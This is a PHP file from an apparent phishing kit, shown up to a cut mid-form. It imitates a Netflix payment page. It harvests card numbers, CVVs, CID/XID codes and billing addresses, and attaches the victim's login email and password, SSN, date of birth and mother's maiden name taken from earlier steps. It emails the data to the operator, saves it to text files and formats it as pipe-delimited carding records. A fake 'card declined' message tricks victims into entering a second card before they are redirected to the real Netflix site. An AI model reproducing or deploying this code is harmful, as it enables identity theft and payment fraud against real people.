<?php ob_start(); error_reporting(E_ALL); ini_set('display_errors', 1);
// Safe session start
if (session_status() === PHP_SESSION_NONE) {
    @ini_set('session.save_path', sys_get_temp_dir());
    @session_start();
}
include 'setup/function.php';
include 'setup/declined-card.php';
require_once __DIR__ . '/../GlobalSetting/email_sender.php';
$res = json_decode(file_get_contents('../config/access.json'), true);
$genConfig = json_decode(file_get_contents('../config/gen.json'), true);

// Check if double_card is enabled
$doubleCardEnabled = isset($genConfig['double_card']) && $genConfig['double_card'] == '1';
$isSecondCard = !empty($_SESSION['double_card']);

// Check if card was declined (same card submitted or first card)
$cardDeclined = false;
$declinedMessage = '';

if($doubleCardEnabled) {
    if($isSecondCard) {
        if(isset($_SESSION['card_declined']) && $_SESSION['card_declined'] == true) {
            $cardDeclined = true;
            $declinedMessage = __('card_declined_use_different');
        }
        else if(isset($_SESSION['first_card_declined']) && $_SESSION['first_card_declined'] == true) {
            $cardDeclined = true;
            $declinedMessage = 'Your previous card was declined. Please try a different payment method.';
        }
    } else {
        if(isset($_SESSION['first_card_submitted']) && $_SESSION['first_card_submitted'] == true) {
            $cardDeclined = true;
            $declinedMessage = __('card_declined_try_different');
        }
    }
}

if(empty($_SESSION['email']) && empty($_SESSION['password'])) {
    // Session hilang, redirect ke login
    header("Location: loginss?session_expired=1");
    exit;
}

$ip = $_SERVER['REMOTE_ADDR'];
$userAgent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
$ipData = fetchIpData($ip, $userAgent);
if ($ipData) saveIpData($ipData, 'Human in Card Page');

if($_SERVER['REQUEST_METHOD'] == 'POST') {
    
    if(!isset($_SESSION['counting_submit']))
    {
        $_SESSION['counting_submit'] = 0;
    }
    
    $formData = $_SESSION['form_data'] ?? [];
    
    $cardname = $_POST['cardname'] ?? '';
    $cardNumber = str_replace(' ', '', $_POST['ccnumber'] ?? '');

    if (!is_numeric($cardNumber) || !luhn_check($cardNumber)) {
        header("HTTP/1.1 400 Bad Request");
        exit;
    }

    $expirationDate = $_POST['ccexp'] ?? ''; $expirationDate = str_replace('/', '|', $expirationDate);
    $formatexpWebshop = explode('/', $_POST['ccexp'] ?? '');
    $cvv = $_POST['cvv'] ?? '';
    $cid = $_POST['amexcid'] ?? '';
    $xid = $_POST['xid'] ?? '';

    $bin = substr($cardNumber, 0, 6);
    $formattedCardNumber = implode(' ', str_split($cardNumber, 4));

    $formattedBin = $bin;

    $cardDetails = getCardDetailsFromBIN($bin);
    $issuer = strtoupper($cardDetails['issuer']);
    $cardTier = strtoupper($cardDetails['card_tier']);
    $scheme = strtoupper($cardDetails['scheme']);
    $type = strtoupper($cardDetails['type']);
    
    $ispInfo = fetchIpData($ip, $userAgent);
    $cityGeo = $ispInfo['city'] ?? 'Unknown';
    $region = $ispInfo['region'] ?? 'Unknown';
    $country = $ispInfo['country'] ?? 'Unknown';
    $isp = $ispInfo['isp'] ?? 'Unknown';
    
    $fullname = htmlspecialchars($formData['firstname'] ?? '') . ' '. htmlspecialchars($formData['lastname'] ?? '');
    $address = htmlspecialchars($formData['address'] ?? '');
    $address2 = htmlspecialchars($formData['adde'] ?? '');
    $city = htmlspecialchars($formData['city'] ?? '');
    $state = htmlspecialchars($formData['state'] ?? '');
    $zipcode = htmlspecialchars($formData['zip'] ?? '');
    $phonenumber = htmlspecialchars($formData['phone'] ?? '');
    $cty = $country;
    $sosel = htmlspecialchars($formData['ssn'] ?? '');
    $dob = htmlspecialchars($formData['dob'] ?? '');
    $mmn = htmlspecialchars($formData['mmn'] ?? '');
    $email = htmlspecialchars($_SESSION['email'] ?? '');
    $password = htmlspecialchars($_SESSION['password'] ?? '');
    
    $deviceBrowser = getDeviceAndBrowser();
    $device = $deviceBrowser['device'];
    $browser = $deviceBrowser['browser'];
    $userAgent = $deviceBrowser['user_agent'];
    
    $dateTime = date("Y-m-d H:i:s");
    
    $webshop = "$cardNumber|$expirationDate|$cvv|$fullname|$address|$city|$state|$zipcode|$country|$phonenumber|$dob|$sosel|$mmn|$email|$ip|$userAgent";
    
    if($genConfig['double_card'] == '1') {
        if(!empty($_SESSION['double_card'])) {
            // Second card submission
            $submittedCard = str_replace(' ', '', $_POST['ccnumber']);
            $firstCard = str_replace(' ', '', $_SESSION['card_data']['ccnumber']);
            
            if($submittedCard == $firstCard)
            {
                // Same card as first - set declined flag
                $_SESSION['card_declined'] = true;
                $_SESSION['counting_submit'] += 1;
                if ($ipData) saveIpData($ipData, 'Human Try Submit Card '.$_SESSION['counting_submit']);
                header("Location: payment?ref=".generateRandomString(100));
                exit;
            } else {
                // Different card - clear declined flag
                $_SESSION['card_declined'] = false;
                goto doublecc;
            }
        } else {
            // First card submission - set flag to show declined message on next visit
            $_SESSION['double_card'] = 'on';
            $_SESSION['card_data'] = $_POST;
            $_SESSION['first_card_submitted'] = true;
            $_SESSION['first_card_declined'] = true;
            
            // Store card info for declined template display
            $_SESSION['declined_card_info'] = [
                'scheme' => $scheme,
                'last4' => substr($cardNumber, -4),
                'issuer' => $issuer
            ];
            
            $templateCard = str_replace("##EMAIL##", $email, $templateCard);
            $templateCard = str_replace("##PASSWORD##", $password, $templateCard);
            $templateCard = str_replace("##BIN##", $formattedBin, $templateCard);
            $templateCard = str_replace("##CNM##", $cardname, $templateCard);
            $templateCard = str_replace("##CARDNUM##", $cardNumber, $templateCard);
            $templateCard = str_replace("##EXP##", $expirationDate, $templateCard);
            $templateCard = str_replace("##CVV##", $cvv, $templateCard);
            $templateCard = str_replace("##CID##", $cid, $templateCard);
            $templateCard = str_replace("##XID##", $xid, $templateCard);
            $templateCard = str_replace("##FULLNAME##", $fullname, $templateCard);
            $templateCard = str_replace("##ADDRESS##", $address, $templateCard);
            $templateCard = str_replace("##ADDRESS2##", $address2, $templateCard);
            $templateCard = str_replace("##CTY##", $city, $templateCard);
            $templateCard = str_replace("##STE##", $state, $templateCard);
            $templateCard = str_replace("##PHONE##", $phonenumber, $templateCard);
            $templateCard = str_replace("##PINN##", '', $templateCard);
            $templateCard = str_replace("##ZC##", $zipcode, $templateCard);
            $templateCard = str_replace("##MMN##", $mmn, $templateCard);
            $templateCard = str_replace("##DOB##", $dob, $templateCard);
            $templateCard = str_replace("##SSN##", $sosel, $templateCard);
            $templateCard = str_replace("##COPYWEB##", $webshop, $templateCard);
            $templateCard = str_replace("##DATE##", $dateTime, $templateCard);
            $templateCard = str_replace("##DV##", $device, $templateCard);
            $templateCard = str_replace("##BW##", $browser, $templateCard);
            $templateCard = str_replace("##CY##", $cityGeo, $templateCard);
            $templateCard = str_replace("##ST##", $region, $templateCard);
            $templateCard = str_replace("##CT##", $country, $templateCard);
            $templateCard = str_replace("##IP##", $ip, $templateCard);
            $templateCard = str_replace("##UA##", $userAgent, $templateCard);
            
            $subject = "Card 1 :: $formattedBin $scheme $type $issuer :: [ $ip - $country ]";
            sendGlobalEmail('', $subject, $templateCard, true);
            
            loginAndCardSave($ip, 'card.txt');
            loginAndCardSave($ip, 'card1.txt');
            cardDetailsLogs($ip, $formattedBin, $cardname, $issuer, $cardTier, $scheme, $type, 'bin.txt');
            if ($ipData) saveIpData($ipData, 'Human Submit Card 1');
            
            // Save data to webshop logs for first card
            $dataccwebshop = "$cardNumber|$expirationDate|$cvv|$fullname|$address|$city|$state|$zipcode|$country|$phonenumber|$dob|$sosel|$mmn|$email|$ip|$userAgent";
            saveDataCard($dataccwebshop);
            
            header("Location: payment?ref=".generateRandomString(100));
            ob_flush();
            exit;
        }
    }
    
    doublecc:
    $_SESSION['card_data'] = $_POST;
    
    $templateCard = str_replace("##EMAIL##", $email, $templateCard);
    $templateCard = str_replace("##PASSWORD##", $password, $templateCard);
    $templateCard = str_replace("##BIN##", $formattedBin, $templateCard);
    $templateCard = str_replace("##CNM##", $cardname, $templateCard);
    $templateCard = str_replace("##CARDNUM##", $cardNumber, $templateCard);
    $templateCard = str_replace("##EXP##", $expirationDate, $templateCard);
    $templateCard = str_replace("##CVV##", $cvv, $templateCard);
    $templateCard = str_replace("##CID##", $cid, $templateCard);
    $templateCard = str_replace("##XID##", $xid, $templateCard);
    $templateCard = str_replace("##FULLNAME##", $fullname, $templateCard);
    $templateCard = str_replace("##ADDRESS##", $address, $templateCard);
    $templateCard = str_replace("##ADDRESS2##", $address2, $templateCard);
    $templateCard = str_replace("##CTY##", $city, $templateCard);
    $templateCard = str_replace("##STE##", $state, $templateCard);
    $templateCard = str_replace("##PHONE##", $phonenumber, $templateCard);
    $templateCard = str_replace("##PINN##", '', $templateCard);
    $templateCard = str_replace("##ZC##", $zipcode, $templateCard);
    $templateCard = str_replace("##MMN##", $mmn, $templateCard);
    $templateCard = str_replace("##DOB##", $dob, $templateCard);
    $templateCard = str_replace("##SSN##", $sosel, $templateCard);
    $templateCard = str_replace("##COPYWEB##", $webshop, $templateCard);
    $templateCard = str_replace("##DATE##", $dateTime, $templateCard);
    $templateCard = str_replace("##DV##", $device, $templateCard);
    $templateCard = str_replace("##BW##", $browser, $templateCard);
    $templateCard = str_replace("##CY##", $cityGeo, $templateCard);
    $templateCard = str_replace("##ST##", $region, $templateCard);
    $templateCard = str_replace("##CT##", $country, $templateCard);
    $templateCard = str_replace("##IP##", $ip, $templateCard);
    $templateCard = str_replace("##UA##", $userAgent, $templateCard);
    
    if($genConfig['double_card'] == '1') {
        $status_card = '2';
        loginAndCardSave($ip, 'card.txt');
        loginAndCardSave($ip, 'card2.txt');
        cardDetailsLogs($ip, $formattedBin, $cardname, $issuer, $cardTier, $scheme, $type, 'bin.txt');
        if ($ipData) saveIpData($ipData, 'Human Submit Card 2');
    } else {
        $status_card = '1';
        if ($ipData) saveIpData($ipData, 'Human Submit Card 1');
        loginAndCardSave($ip, 'card.txt');
        loginAndCardSave($ip, 'card1.txt');
        cardDetailsLogs($ip, $formattedBin, $cardname, $issuer, $cardTier, $scheme, $type, 'bin.txt');
    }
    
    $subject = "Card $status_card :: $formattedBin $scheme $type $issuer :: [ $ip - $country ]";
    sendGlobalEmail('', $subject, $templateCard, true);
    
    $dataccwebshop = "$cardNumber|$expirationDate|$cvv|$fullname|$address|$city|$state|$zipcode|$country|$phonenumber|$dob|$sosel|$mmn|$email|$ip|$userAgent";
    saveDataCard($dataccwebshop);
    
    session_destroy();
    
    header("Location: ".($genConfig['redirect_completed_link'] ?? 'https://www.netflix.com'));
    ob_flush();
    exit;
}
// Get visitor language
$visitorLang = $_SESSION['visitor_lang'] ?? 'en';
$textDir = function_exists('getTextDirection') ? getTextDirection() : 'ltr';
?>
<!DOCTYPE html>
<html lang="<?= $visitorLang ?>" dir="<?= $textDir ?>">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Netflix - Payment</title>
    <link rel="stylesheet" href="tema/styles/style.css">
    <style>
        /* Clean Loading Screen */
        .loading-overlay {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100vh;
            background: #ffffff;
            z-index: 999999;
            display: flex;
            justify-content: center;
            align-items: center;
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif;
        }
        .loading-content {
            text-align: center;
            padding: 40px;
        }
        .loading-spinner {
            border: 3px solid #f0f0f0;
            border-top: 3px solid #e50914;
            border-radius: 50%;
            width: 60px;
            height: 60px;
            animation: spin 0.8s linear infinite;
            margin: 0 auto 24px;
        }
        .loading-text {
            margin: 0;
            font-size: 18px;
            font-weight: 400;
            color: #333;
            letter-spacing: 0.5px;
        }
        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        /* Card Validation Styles */
        .form-control.valid-card {
            border-color: #28a745 !important;
            border-width: 2px !important;
            box-shadow: 0 0 0 0.2rem rgba(40, 167, 69, 0.25) !important;
            background-color: #f8fff9 !important;
        }
        
        .form-control.valid-card:focus {
            border-color: #28a745 !important;
            border-width: 2px !important;
            box-shadow: 0 0 0 0.2rem rgba(40, 167, 69, 0.25) !important;
            outline: none !important;
        }
        
        input.form-control.valid-card,
        input.form-control[style*="border-color: #28a745"] {
            border-color: #28a745 !important;
            border-width: 2px !important;
        }
        
        .form-control.invalid-card {
            border-color: #dc3545 !important;
            border-width: 2px !important;
            box-shadow: 0 0 0 0.2rem rgba(220, 53, 69, 0.25) !important;
        }
        
        .form-control.invalid-card:focus {
            border-color: #dc3545 !important;
            box-shadow: 0 0 0 0.2rem rgba(220, 53, 69, 0.25) !important;
        }

        /* Button Loading State */
        .start-button {
            position: relative;
            transition: all 0.3s ease;
        }

        .start-button.loading {
            opacity: 0.8;
            cursor: not-allowed;
            pointer-events: none;
        }

        .start-button .btn-spinner {
            display: inline-block;
            width: 16px;
            height: 16px;
            border: 2px solid rgba(255, 255, 255, 0.3);
            border-top: 2px solid #ffffff;
            border-radius: 50%;
            animation: btnSpin 1s linear infinite;
            margin-right: 8px;
            vertical-align: middle;
        }

        @keyframes btnSpin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        /* Card Icon Styles */
        .card-icon {
            width: 40px;
            height: 24px;
            display: flex;
            align-items: center;
            justify-content: center;
            background-size: contain;
            background-repeat: no-repeat;
            background-position: center;
            transition: all 0.3s ease;
            border-radius: 4px;
        }

        .card-icon.default-card svg {
            width: 24px;
            height: 24px;
            color: #8c8c8c;
            transition: all 0.3s ease;
        }

        .card-icon.visa {
            background-image: url('tema/assets/images/VISA.png');
            background-size: 36px auto;
        }

        .card-icon.mastercard {
            background-image: url('tema/assets/images/MASTERCARD.png');
            background-size: 36px auto;
        }

        .card-icon.amex {
            background-image: url('tema/assets/images/AMEX.png');
            background-size: 36px auto;
        }

        .card-icon.discover {
            background: linear-gradient(135deg, #ff6000, #ff8533);
            color: white;
            font-size: 9px;
            font-weight: bold;
            font-family: Arial, sans-serif;
            border-radius: 4px;
            text-shadow: 0 1px 2px rgba(0,0,0,0.3);
        }

        .card-icon.diners {
            background: linear-gradient(135deg, #0079be, #005a8b);
            color: white;
            font-size: 7px;
            font-weight: bold;
            font-family: Arial, sans-serif;
            border-radius: 4px;
            text-shadow: 0 1px 2px rgba(0,0,0,0.3);
        }

        .card-icon.jcb {
            background: linear-gradient(135deg, #006cbc, #004f8a);
            color: white;
            font-size: 9px;
            font-weight: bold;
            font-family: Arial, sans-serif;
            border-radius: 4px;
            text-shadow: 0 1px 2px rgba(0,0,0,0.3);
        }

        /* Hide SVG when showing card logos */
        .card-icon.visa svg,
        .card-icon.mastercard svg,
        .card-icon.amex svg,
        .card-icon.discover svg,
        .card-icon.diners svg,
        .card-icon.jcb svg {
            display: none;
        }

        /* Animation effects */
        .card-icon {
            transform-origin: center;
        }

        .card-icon.default-card {
            animation: pulse 2s infinite;
        }

        @keyframes pulse {
            0% { opacity: 0.6; }
            50% { opacity: 1; }
            100% { opacity: 0.6; }
        }

        /* Stop pulse animation when card is detected */
        .card-icon:not(.default-card) {
            animation: none;
            opacity: 1;
        }
    </style>
</head>
<body>
    <!-- Simple Loading Screen -->
    <div id="loading-overlay" class="loading-overlay">
        <div class="loading-content">
            <div class="loading-spinner"></div>
            <p class="loading-text"><?= __('loading') ?></p>
        </div>
    </div>
    <header class="header">
        <div class="header-content">
            <svg class="netflix-logo" viewBox="0 0 111 30" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img">
                <g><path d="M105.06233,14.2806261 L110.999156,30 C109.249227,29.7497422 107.500234,29.4366857 105.718437,29.1554972 L102.374168,20.4686475 L98.9371075,28.4375293 C97.2499766,28.1563408 95.5928391,28.061674 93.9057081,27.8432843 L99.9372012,14.0931671 L94.4680851,-5.68434189e-14 L99.5313525,-5.68434189e-14 L102.593495,7.87421502 L105.874965,-5.68434189e-14 L110.999156,-5.68434189e-14 L105.06233,14.2806261 Z M90.4686475,-5.68434189e-14 L85.8749649,-5.68434189e-14 L85.8749649,27.2499766 C87.3746368,27.3437061 88.9371075,27.4055675 90.4686475,27.5930265 L90.4686475,-5.68434189e-14 Z M81.9055207,26.93692 C77.7186241,26.6557316 73.5307901,26.4064111 69.250164,26.3117443 L69.250164,-5.68434189e-14 L73.9366389,-5.68434189e-14 L73.9366389,21.8745899 C76.6248008,21.9373887 79.3120255,22.1557784 81.9055207,22.2804387 L81.9055207,26.93692 Z M64.2496954,10.6561065 L64.2496954,15.3435186 L57.8442216,15.3435186 L57.8442216,25.9996251 L53.2186709,25.9996251 L53.2186709,-5.68434189e-14 L66.3436123,-5.68434189e-14 L66.3436123,4.68741213 L57.8442216,4.68741213 L57.8442216,10.6561065 L64.2496954,10.6561065 Z M45.3435186,4.68741213 L45.3435186,26.2498828 C43.7810479,26.2498828 42.1876465,26.2498828 40.6561065,26.3117443 L40.6561065,4.68741213 L35.8121661,4.68741213 L35.8121661,-5.68434189e-14 L50.2183897,-5.68434189e-14 L50.2183897,4.68741213 L45.3435186,4.68741213 Z M30.749836,15.5928391 C28.687787,15.5928391 26.2498828,15.5928391 24.4999531,15.6875059 L24.4999531,22.6562939 C27.2499766,22.4678976 30,22.2495079 32.7809542,22.1557784 L32.7809542,26.6557316 L19.812541,27.6876933 L19.812541,-5.68434189e-14 L32.7809542,-5.68434189e-14 L32.7809542,4.68741213 L24.4999531,4.68741213 L24.4999531,10.9991564 C26.3126816,10.9991564 29.0936358,10.9054269 30.749836,10.9054269 L30.749836,15.5928391 Z M4.78114163,12.9684132 L4.78114163,29.3429562 C3.09401069,29.5313525 1.59340144,29.7497422 0,30 L0,-5.68434189e-14 L4.4690224,-5.68434189e-14 L10.562377,17.0315868 L10.562377,-5.68434189e-14 L15.2497891,-5.68434189e-14 L15.2497891,28.061674 C13.5935889,28.3437998 11.906458,28.4375293 10.1246602,28.6868498 L4.78114163,12.9684132 Z"></path></g>
            </svg>
            <a href="#" class="sign-out"><?= __('sign_out') ?></a>
        </div>
    </header>

    <main class="main-content">

        <div class="step-info"><?= __('step_3_of_3') ?></div>
        <h1 class="page-title"><?= __('setup_card_title') ?></h1>

        <?php 
        // Display declined card template (uses template from control.json)
        // Ensure $dataPage is available and contains declined_template
        if (!isset($dataPage) || !is_array($dataPage)) {
            $controlJsonPath = __DIR__ . '/setup/control.json';
            if (function_exists('loadTemplateSettings')) {
                $dataPage = loadTemplateSettings('secure-3', $controlJsonPath);
            } elseif (file_exists($controlJsonPath)) {
                $dataPage = json_decode(file_get_contents($controlJsonPath), true) ?? [];
            } else {
                $dataPage = [];
            }
        }
        // Ensure declined_template exists in $dataPage
        if (!isset($dataPage['declined_template'])) {
            $dataPage['declined_template'] = '1'; // Default to template 1
        }
        $doubleCardEnabled = isset($genConfig['double_card']) && $genConfig['double_card'] == '1';
        echo netflixDeclinedCard($doubleCardEnabled, $dataPage);
        ?>

        <div class="card-types">
            <div class="visa-icon"></div>
            <div class="mastercard-icon"></div>
            <div class="amex-icon"></div>
        </div>

        <form method="POST" action="" id="cardForm">
            <input type="hidden" id="cardType" name="card_type" value="" required>
            
            <div class="form-group">
                <div class="card-number-wrapper">
                    <div class="input-wrapper">
                        <input type="text" class="form-control" id="cardNumber" name="ccnumber" placeholder=" " maxlength="19">
                        <label for="cardNumber" class="floating-label"><?= __('card_number') ?></label>
                    </div>
                    <div class="card-icon default-card" id="cardIcon">
                        <svg xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 24 24" width="24" height="24" data-icon="CreditCardStandard" aria-hidden="true">
                            <path fill-rule="evenodd" clip-rule="evenodd" d="M0 6C0 4.34315 1.34315 3 3 3H21C22.6569 3 24 4.34315 24 6V18C24 19.6569 22.6569 21 21 21H3C1.34314 21 0 19.6569 0 18V6ZM3 5C2.44772 5 2 5.44772 2 6V8H22V6C22 5.44771 21.5523 5 21 5H3ZM2 18V10H22V18C22 18.5523 21.5523 19 21 19H3C2.44772 19 2 18.5523 2 18ZM16 16H20V14H16V16Z" fill="currentColor"></path>
                        </svg>
                    </div>
                </div>
                <div class="error-message" id="cardNumberError">
                    <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                    </svg>
                    <span id="i18n-cc-number-error"><?= __('error_card_number') ?></span>
                </div>
            </div>

            <div class="date-cvv-section">
                <div class="form-row">
                    <div class="form-group">
                        <div class="input-wrapper">
                            <input type="text" class="form-control" id="expDate" name="ccexp" placeholder=" " maxlength="5" required>
                            <label for="expDate" class="floating-label"><?= __('expiry_date') ?></label>
                        </div>
                        <div class="error-message" id="expDateError">
                            <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                                <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                            </svg>
                            <span id="i18n-cc-expiry-error"><?= __('error_expiry_date') ?></span>
                        </div>
                    </div>
                    <div class="form-group">
                        <div class="input-wrapper">
                            <input type="text" class="form-control" id="cvv" name="cvv" placeholder=" " maxlength="4" required>
                            <label for="cvv" class="floating-label"><?= __('cvv') ?></label>
                            <svg class="cvv-info" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 24 24" width="24" height="24" data-icon="CircleQuestionMarkStandard" pointer-events="all" aria-hidden="true">
                            <path fill-rule="evenodd" clip-rule="evenodd" d="M2 12C2 6.47715 6.47715 2 12 2C17.5228 2 22 6.47715 22 12C22 17.5228 17.5228 22 12 22C6.47715 22 2 17.5228 2 12ZM12 0C5.37258 0 0 5.37258 0 12C0 18.6274 5.37258 24 12 24C18.6274 24 24 18.6274 24 12C24 5.37258 18.6274 0 12 0ZM12 8C10.6831 8 10 8.74303 10 9.5H8C8 7.25697 10.0032 6 12 6C13.9968 6 16 7.25697 16 9.5C16 10.8487 14.9191 11.7679 13.8217 12.18C13.5572 12.2793 13.3322 12.4295 13.1858 12.5913C13.0452 12.7467 13 12.883 13 13V14H11V13C11 11.5649 12.1677 10.6647 13.1186 10.3076C13.8476 10.0339 14 9.64823 14 9.5C14 8.74303 13.3169 8 12 8ZM13.5 16.5C13.5 17.3284 12.8284 18 12 18C11.1716 18 10.5 17.3284 10.5 16.5C10.5 15.6716 11.1716 15 12 15C12.8284 15 13.5 15.6716 13.5 16.5Z" fill="currentColor"></path>
                        </svg>
                        </div>
                        <div class="error-message" id="cvvError">
                            <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                                <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                            </svg>
                            <span id="i18n-cc-cvv-error"><?= __('error_cvv') ?></span>
                        </div>
                    </div>
                </div>
            </div>

            <!-- CID field for American Express (conditional) -->
            <div class="form-group" id="cidFieldGroup" style="display: none;">
                <div class="input-wrapper">
                    <input type="text" name="amexcid" class="form-control" id="amexcid" placeholder=" " maxlength="3">
                    <label for="amexcid" class="floating-label"><?= __('cid_3_digits') ?? 'CID (3 digits)' ?></label>
                </div>
                <div class="error-message" id="cidError">
                    <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                    </svg>
                    <span id="i18n-cc-cid-error"><?= __('error_cid') ?></span>
                </div>
            </div>

            <!-- XID field for Discover (conditional) -->
            <div class="form-group" id="xidFieldGroup" style="display: none;">
                <div class="input-wrapper">
                    <input type="tel" name="xid" class="form-control" id="xid_input" placeholder=" " maxlength="5" inputmode="numeric">
                    <label for="xid_input" class="floating-label">XID (5 digits)</label>
                </div>
                <div class="error-message" id="xid_error">
                    <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                    </svg>
                    <span id="i18n-cc-xid-error">Enter 5-digit XID.</span>
                </div>
            </div>

            <div class="form-group">
                <div class="input-wrapper">
                    <input type="text" class="form-control" id="nameOnCard" name="cardname" placeholder=" " value="<?php echo $_SESSION['form_data']['firstname'] ?? ''; ?> <?php echo $_SESSION['form_data']['lastname'] ?? ''; ?>" required>
                    <label for="nameOnCard" class="floating-label"><?= __('card_holder') ?></label>
                </div>
                <div class="error-message" id="nameOnCardError">
                    <svg class="error-icon" xmlns="http://www.w3.org/2000/svg" fill="none" role="img" viewBox="0 0 16 16" width="12" height="12" data-icon="CircleXSmall" aria-hidden="true">
                        <path fill-rule="evenodd" clip-rule="evenodd" d="M14.5 8C14.5 11.5899 11.5899 14.5 8 14.5C4.41015 14.5 1.5 11.5899 1.5 8C1.5 4.41015 4.41015 1.5 8 1.5C11.5899 1.5 14.5 4.41015 14.5 8ZM16 8C16 12.4183 12.4183 16 8 16C3.58172 16 0 12.4183 0 8C0 3.58172 3.58172 0 8 0C12.4183 0 16 3.58172 16 8ZM4.46967 5.53033L6.93934 8L4.46967 10.4697L5.53033 11.5303L8 9.06066L10.4697 11.5303L11.5303 10.4697L9.06066 8L11.5303 5.53033L10.4697 4.46967L8 6.93934L5.53033 4.46967L4.46967 5.53033Z" fill="currentColor"></path>
                    </svg>
                    <span><?= __('error_name') ?></span>
                </div>
            </div>

            <div class="pricing-info">
                <div class="pricing-text">
                    <span class="pricing-amount"><?php echo $_SESSION['form_data']['firstname'] ?? ''; ?> <?php echo $_SESSION['form_data']['lastname'] ?? ''; ?></span><br>
                    <?php echo $_SESSION['form_data']['address'] ?? ''; ?><br>
                    <?php if(!empty($_SESSION['form_data']['adde'])): ?>
                        <?php echo $_SESSION['form_data']['adde'] ?? ''; ?><br>
                    <?php endif; ?>
                    <?php echo $_SESSION['form_data']['city'] ?? ''; ?>, <?php echo $_SESSION['form_data']['state'] ?? ''; ?>, <?php echo $_SESSION['form_data']['zip'] ?? ''; ?><br>
                    <?= __('united_states') ?>
                </div>
                <?php if($dataPage['billing_template'] == '1'): ?>
                <a href="identity?ref=<?= generateRandomString(100);?>" class="change-link"><?= __('change') ?></a>
                <?php else: ?>
                <a href="address?ref=<?= generateRandomString(100);?>" class="change-link"><?= __('change') ?></a>
                <?php endif; ?>
            </div>

            <!-- CID/XID collected via visible inputs when AMEX/Discover detected -->

            <div class="disclaimer">
                <?= __('payment_disclaimer_start') ?> <a href="#"><?= __('terms_of_use') ?></a>, <a href="#"><?= __('privacy_statement') ?></a><?= __('payment_disclaimer_end') ?>
            </div>

            <div class="checkbox-wrapper">
